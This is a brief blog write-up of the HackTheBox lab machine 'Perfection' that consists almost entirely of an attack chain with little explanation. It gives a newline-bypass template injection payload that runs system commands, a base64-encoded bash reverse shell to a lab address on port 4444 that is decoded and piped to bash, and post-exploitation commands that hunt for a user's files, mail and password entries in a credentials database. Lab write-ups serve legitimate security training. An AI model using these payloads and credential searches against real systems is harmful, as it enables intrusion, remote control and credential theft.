HTB: Perfection

ShellPunk

Jorge Moreno / June 23, 2024

1 min read––– views

A new line is enough to bypass the control

bookmark

%0A<%25=system("ping+-c1+10.10.16.3")%25>


echo "bash -i >& /dev/tcp/10.10.16.3/4444 0>&1" | base64 | sed 's/\+/\%2b/'

echo "YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4xMC4xNi4zLzQ0NDQgMD4mMQo=" | base64 -d |bash


# Files owned by the user
find / -uid 1001 -type f -ls 2>/dev/null | grep -v "/proc*"

# Files with the name of the user in it
find / -name "*susan*" -type f -ls 2>/dev/null
cat /var/mail/susan

# Files with the word password in the home directory
grep -i password -R . 
strings Migration/pupilpath_credentials.db | grep -i "susan"

bookmark

Subscribe to the newsletter

Get emails from me about hacking, ctf, software development and all new articles.

- subscribers – View all issues

Discuss on TwitterSuggest Change